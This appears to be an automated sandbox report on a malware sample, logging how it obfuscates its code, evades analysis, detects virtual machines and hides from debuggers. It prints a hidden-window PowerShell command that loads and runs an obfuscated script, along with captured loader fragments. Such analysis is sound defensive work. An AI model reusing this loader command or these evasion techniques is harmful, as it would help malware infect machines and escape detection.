      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Justificante.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147024134.0000000006D2D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb? source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: Binary string: wntdll.pdb source: Apathism.exe
      Source: Binary string: System.Core.pdb" source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp

      Data Obfuscation

      Source: Yara match, File source: 00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: GetDelegateForFunctionPointer((Finners $Carvings100 $variabelforklaringerne), (Logistical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:preadamic = [AppDomain]::CurrentDomain.GetAssemb
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Omtydedes)), $Upholders).DefineDynamicModule($Parvirostrate108, $false).DefineType($Cav, $finnack, [System.MulticastDelegate])$Unpacka
      Source: C:\Users\user\Desktop\Justificante.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, Code function: 7_2_223309AD push ecx; mov dword ptr [esp], ecx, 7_2_223309B6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\Apathism.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Users\user\Desktop\Justificante.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe API/Special instruction interceptor: Address: 6042F9E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Code function: 7_2_2237096E rdtsc 7_2_2237096E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7957
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1694
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe API coverage: 0.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524 Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe TID: 6688 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\Justificante.exe Code function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
      Source: C:\Users\user\Desktop\Justificante.exe Code function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: C:\Users\user\Desktop\Justificante.exe Code function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
      Source: Justificante.exe, 00000000.00000002.1504902892.0000000000555000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yp
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2563282509.000000000669D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2563282509.000000000669D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`'j
      Source: Justificante.exe, 00000000.00000003.1472429055.0000000000579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wwwhttp://0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94__J
      Source: C:\Users\user\Desktop\Justificante.exe API call chain: ExitProcess graph end node graph_0-3648
      Source: C:\Users\user\Desktop\Justificante.exe API call chain: ExitProcess graph end node graph_0-3806
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Process queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Code function: 7_2_2237096E rdtsc 7_2_2237096E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_070A9B1B LdrInitializeThunk,LdrInitializeThunk,2_2_070A9B1B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe Code function: 7_2_2232823B mov eax, dword ptr fs:[00000030h] 7_2_2232823B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F61C3 mov eax, dword ptr fs:[00000030h]7_2_223F61C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E627 mov eax, dword ptr fs:[00000030h]7_2_2234E627
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22366620 mov eax, dword ptr fs:[00000030h]7_2_22366620
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368620 mov eax, dword ptr fs:[00000030h]7_2_22368620
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233262C mov eax, dword ptr fs:[00000030h]7_2_2233262C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372619 mov eax, dword ptr fs:[00000030h]7_2_22372619
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE609 mov eax, dword ptr fs:[00000030h]7_2_223AE609
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22362674 mov eax, dword ptr fs:[00000030h]7_2_22362674
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F866E mov eax, dword ptr fs:[00000030h]7_2_223F866E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F866E mov eax, dword ptr fs:[00000030h]7_2_223F866E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A660 mov eax, dword ptr fs:[00000030h]7_2_2236A660
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A660 mov eax, dword ptr fs:[00000030h]7_2_2236A660
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234C640 mov eax, dword ptr fs:[00000030h]7_2_2234C640
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223666B0 mov eax, dword ptr fs:[00000030h]7_2_223666B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C6A6 mov eax, dword ptr fs:[00000030h]7_2_2236C6A6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334690 mov eax, dword ptr fs:[00000030h]7_2_22334690
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334690 mov eax, dword ptr fs:[00000030h]7_2_22334690
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B06F1 mov eax, dword ptr fs:[00000030h]7_2_223B06F1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B06F1 mov eax, dword ptr fs:[00000030h]7_2_223B06F1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A6C7 mov ebx, dword ptr fs:[00000030h]7_2_2236A6C7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A6C7 mov eax, dword ptr fs:[00000030h]7_2_2236A6C7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov eax, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov ecx, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov eax, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AC730 mov eax, dword ptr fs:[00000030h]7_2_223AC730
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C720 mov eax, dword ptr fs:[00000030h]7_2_2236C720
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C720 mov eax, dword ptr fs:[00000030h]7_2_2236C720
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330710 mov eax, dword ptr fs:[00000030h]7_2_22330710
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22360710 mov eax, dword ptr fs:[00000030h]7_2_22360710
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C700 mov eax, dword ptr fs:[00000030h]7_2_2236C700
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338770 mov eax, dword ptr fs:[00000030h]7_2_22338770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330750 mov eax, dword ptr fs:[00000030h]7_2_22330750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE75D mov eax, dword ptr fs:[00000030h]7_2_223BE75D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372750 mov eax, dword ptr fs:[00000030h]7_2_22372750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372750 mov eax, dword ptr fs:[00000030h]7_2_22372750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B4755 mov eax, dword ptr fs:[00000030h]7_2_223B4755
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov esi, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov eax, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov eax, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223307AF mov eax, dword ptr fs:[00000030h]7_2_223307AF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E47A0 mov eax, dword ptr fs:[00000030h]7_2_223E47A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D678E mov eax, dword ptr fs:[00000030h]7_2_223D678E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223347FB mov eax, dword ptr fs:[00000030h]7_2_223347FB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223347FB mov eax, dword ptr fs:[00000030h]7_2_223347FB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE7E1 mov eax, dword ptr fs:[00000030h]7_2_223BE7E1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233C7C0 mov eax, dword ptr fs:[00000030h]7_2_2233C7C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B07C3 mov eax, dword ptr fs:[00000030h]7_2_223B07C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A430 mov eax, dword ptr fs:[00000030h]7_2_2236A430
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C427 mov eax, dword ptr fs:[00000030h]7_2_2232C427
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
